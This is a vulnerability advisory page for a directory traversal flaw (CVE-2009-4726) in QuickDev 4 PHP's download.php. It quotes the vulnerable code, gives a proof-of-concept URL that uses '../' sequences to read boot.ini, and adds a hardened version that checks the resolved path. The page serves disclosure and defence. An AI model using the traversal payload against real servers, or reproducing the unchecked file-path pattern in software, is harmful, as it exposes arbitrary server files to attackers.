Quickdev 4 PHP 'download.php' Script Directory Traversal Vulnerability

Vulnerability ID: 1118243
Vulnerability type: Path traversal
Published: 2009-08-03
Updated: 2009-08-03
CVE ID: CVE-2009-4726
CNNVD ID: CNNVD-201003-235
Platform: PHP
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/9334
https://www.securityfocus.com/bid/42555
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201003-235
|Vulnerability details
The download.php script in Quickdev4PHP contains a directory traversal vulnerability. The value of the file parameter is appended to the document root without normalisation or containment checks, so a remote attacker can use ".." sequences in that parameter to traverse any directory and read arbitrary files.
|Vulnerability EXP
#####################################################################################
[+] QuickDev 4 Php (download.php file) Arbitrary File Download
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#####################################################################################

[+] Download : http://sourceforge.net/projects/quickdev4php/files/

[+] Arbitrary File Download

 - Vulnerable code in download.php

--------------------------------------------------------------------------

<?php
// Vulnerable: the "file" request parameter is concatenated onto DOCUMENT_ROOT
// with no normalisation or containment check, so "../" sequences leave the web root.
$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

header("Content-Type: application/force-download");
// basename() only affects the suggested download name, not the path that is read.
header( "Content-Disposition: attachment; filename=".basename($file));

//header( "Content-Description: File Transfer");
// "@" silences read errors; the unchecked path is streamed straight to the client.
@readfile($file);
die();

--------------------------------------------------------------------------

 - PoC

   http://127.0.0.1/download.php?file=../../../../../../boot.ini

#####################################################################################

# milw0rm.com [2009-08-03]
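As a defensive counterpart to the download.php fragment above, here is the same download handler with the file argument confined to a fixed directory. This is example code added for this page, not part of the original advisory or of QuickDev 4 PHP; the DOWNLOAD_DIR constant, the resolve_download_path() helper and the use of $_GET['file'] are assumptions.

```php
<?php
// Added example (not QuickDev 4 PHP code): hardened replacement for download.php.
// Assumption: every downloadable file lives under DOWNLOAD_DIR and the "file"
// parameter is a file name or relative path inside that directory.

define('DOWNLOAD_DIR', __DIR__ . '/downloads');

/**
 * Resolve a user-supplied relative path against DOWNLOAD_DIR and return the
 * absolute path only if it stays inside that directory; otherwise return null.
 */
function resolve_download_path(string $requested): ?string
{
    // NUL bytes would truncate the path in older PHP builds; reject them outright.
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath(DOWNLOAD_DIR);
    if ($base === false) {
        return null; // download directory missing or unreadable
    }
    // realpath() canonicalises "..", "." and symlinks and returns false for
    // non-existent files, so the containment check below sees the real target.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . ltrim($requested, '/\\'));
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Containment check: the resolved path must begin with "<base>/". A symlink
    // inside DOWNLOAD_DIR that points outside it is rejected here as well.
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

$requested = isset($_GET['file']) ? (string) $_GET['file'] : '';
$path = resolve_download_path($requested);
if ($path === null) {
    // Same response for "outside the directory" and "does not exist", so the
    // handler does not reveal which paths are present on the server.
    http_response_code(404);
    exit('File not found');
}

header('Content-Type: application/octet-stream');
// basename() keeps the header free of path separators; quoting preserves spaces.
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
exit;
```

With this layout a request for ../../../../boot.ini resolves to a path outside DOWNLOAD_DIR and is answered with 404 rather than the file contents.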
|Affected products
Olivier michaud and Pierre-Yves QuickDev 4 Php 0
|References

Source: VUPEN
Name: ADV-2009-2126
Link: http://www.vupen.com/english/advisories/2009/2126
Source: MILW0RM
Name: 9334
Link: http://www.milw0rm.com/exploits/9334
Source: SECUNIA
Name: 36130
Link: http://secunia.com/advisories/36130